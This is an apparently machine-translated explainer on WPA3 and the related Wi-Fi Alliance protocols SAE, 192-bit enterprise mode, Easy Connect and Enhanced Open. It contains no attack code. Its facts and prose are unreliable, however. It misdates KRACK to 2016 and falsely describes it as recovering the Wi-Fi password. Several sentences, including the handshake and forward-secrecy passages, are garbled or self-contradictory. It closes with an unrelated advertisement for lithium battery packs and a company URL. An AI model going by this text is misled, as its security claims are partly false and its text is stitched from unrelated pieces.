The Wi-Fi Alliance recently announced the heaviest Wi-Fi security upgrade in 14 years. The Wi-Fi Protected Access 3 (WPA3) security authentication protocol provides some urgently needed updates to the WPA2 protocol launched in 2004. WPA3 does not comprehensively transform Wi-Fi security, but focuses on introducing new technologies to deal with the vulnerabilities that have already appeared in WPA2.
In addition to WPA3, the Wi-Fi Alliance also announced two other independent authentication protocols: Enhanced Open (enhanced open) protocol and Easy Connect (simple connection) protocol. They do not rely on WPA3, but they do improve the security of specific types of networks and specific situations.
All these protocols are now available for manufacturers to integrate into their devices. If WPA2 is going to step down the stage of history, then these agreements will eventually be universally adopted, but the Wi-Fi Alliance has not set any timetable for this. Most likely, as new devices enter the market, we will finally see a turning point, after which WPA3, Enhanced Open and Easy Connect become the new mainstream.
So, what can all these new authentication protocols do? Since most of them are related to wireless encryption and there are many complicated mathematical calculations, this is a bit of a long story. However, this article will only briefly talk about the four main changes that these protocols will bring to wireless security.
Simultaneous Peer Identity Authentication (SAE)
This is the biggest change brought by WPA3. The most important moment in any cyber defense is when a new device or new user tries to connect in. It is safest to block the enemy outside the door, which is why both WPA2 and today's WPA3 place great emphasis on authenticating new connections and ensuring that they are not attempts by attackers to gain access.
SAE is a new method of authenticating devices trying to connect to the network. SAE is a variant of the so-called "dragonfly handshake" that uses encryption technology to prevent eavesdroppers from guessing the password. It specifies exactly how a new device or user should "greet the network router when exchanging encryption keys." ".
SAE replaces the pre-shared key (PSK) method that has been in use since WPA2 was launched in 2004. PSK is also called the "four-way handshake" (four-way handshake), which refers to the four-way handshake or message transmission between the router and the connected device. After the four-way handshake, both parties must directly disclose the agreement beforehand without any party. In the case of the password, prove that you know the password. Until 2016, PSK seemed to be safe until the "key reinstallation attack" (KRACK) was discovered.
A KRACK interrupts a series of handshake by pretending to temporarily lose the connection with the router. In fact, it uses the opportunity of repeated connections to analyze the handshake until the correct password is pieced together. SAE prevents this attack and the more common offline dictionary attack. In an offline dictionary attack, a computer will use hundreds, thousands, or millions of passwords to try to determine which password matches the verification information provided by the PSK handshake.
As the name suggests, SAE works by treating devices as equal, rather than treating one party as an explicit requester and the other party as an authenticator (traditionally connected devices and routers). Either party can initiate a handshake, and then they continue to send their authentication information independently, rather than as part of the back and forth exchange. If there is no exchange back and forth, KRACK has nowhere to go, and dictionary attacks are useless.
SAE provides an additional security feature that PSK does not have: forward secrecy. Suppose an attacker can access the encrypted data sent and received by the router from the wider Internet. Previously, attackers could keep this data, and then, if they succeeded in obtaining a password, they could decrypt the previously stored data. With SAE, the encryption password is changed every time a connection is established. Therefore, even if an attacker enters the network by deception, they can only steal the password to decrypt the transmitted data.
SAE is defined in the standard IEEE 802.11-2016. By the way, the length of the standard exceeds 3,500 pages.
192-bit security protocol
WPA3-Enterprise is a WPA3 certified version for financial institutions, governments and enterprises, with 192-bit encryption. For routers on home networks, this is an excessive level of security, but for networks that handle particularly sensitive information, it makes sense.
Wi-Fi currently provides the security of a 128-bit security protocol. The 192-bit security protocol is not mandatory. It is an optional setting for organizations that want or need to use it for their network. The Wi-Fi Alliance also emphasized that enterprise networks should have strong encryption capabilities: the overall strength of system security depends on its weakest link.
In order to ensure that the overall security of a network is consistent from beginning to end, WPA3-Enterprise will use 256-bit Galois/Counter Mode Protocol for encryption and 384-bit hashed message authentication mode ( Hashed Message Authentication Mode) to create and confirm keys, and use Elliptic Curve Diffie-Hellman (Elliptic Curve Diffie-Hellman) exchange and Elliptic Curve Digital Signature Algorithm to authenticate keys. This is a very complex mathematical problem, but as a result, each step of the process will maintain a 192-bit encryption and security minimum for organizations that need it.
Simple connection
Easy Connect is a recognition of the huge number of connected devices in the world today. Although not everyone is catching up with the smart home trend, compared with 2004, ordinary people now have at least a few more devices connected to their home routers. The Wi-Fi Alliance is working hard to make the connection of all these devices more intuitive. Unlike entering a password every time you want to add something to your network, the device will have a unique QR code-the QR code of each device will be used as a kind of public key. To add a device, you can scan its QR code with a smartphone that is already connected to the network.
After scanning the QR code, the network and the device exchange and verify the key for subsequent connections. Easy Connect is a separate protocol of WPA3: Easy Connect certified devices must be WPA2 certified, but they do not have to be WPA3 certified.
Enhance openness
Enhanced Open is another separate protocol designed to protect you on the open network. Open networks—that is, the networks you connect to at coffee shops and airports—bring a series of problems, and when you connect to a home or work network, you usually don't have to worry about these problems.
Many attacks that occur on open networks are passive attacks. Since there are a large number of people connected to the network, an attacker can obtain a large amount of data by sitting down and filtering the incoming and outgoing data.
Enhanced Open uses "Opportunistic Wireless Encryption" (OWE) to prevent this passive eavesdropping. OWE is defined in the Internet Engineering Task Force RFC 8110 standard. OWE does not require any additional authentication protection, but focuses on improving the encryption of data sent over public networks so that eavesdroppers cannot steal it. It also prevents so-called unsophisticated packet injection, in which the attacker attempts to disrupt the operation of the network by constructing and transmitting data packets that appear to be part of the normal operation of the network.
The reason that Enhanced Open does not provide any authentication protection is due to the nature of open networks—by design, they can be used for general purposes. Enhanced Open aims to improve the defense of open networks against passive attacks without the need for ordinary users to enter additional passwords or perform additional steps.
After Easy Connect and Enhanced Open become the norm, it will take at least a few years for WPA3 to become popular. As routers are replaced or upgraded, the public adoption of WPA3 will happen. If you are concerned about the security of your personal network, you should be able to replace your current router with a WPA3 certified router, because manufacturers will start selling such routers in the next few months.
64V Battery Pack ,Lithium Battery Box,Lithium Power Pack,Jackery Battery Pack
Zhejiang Casnovo Materials Co., Ltd. , https://www.casnovonewenergy.com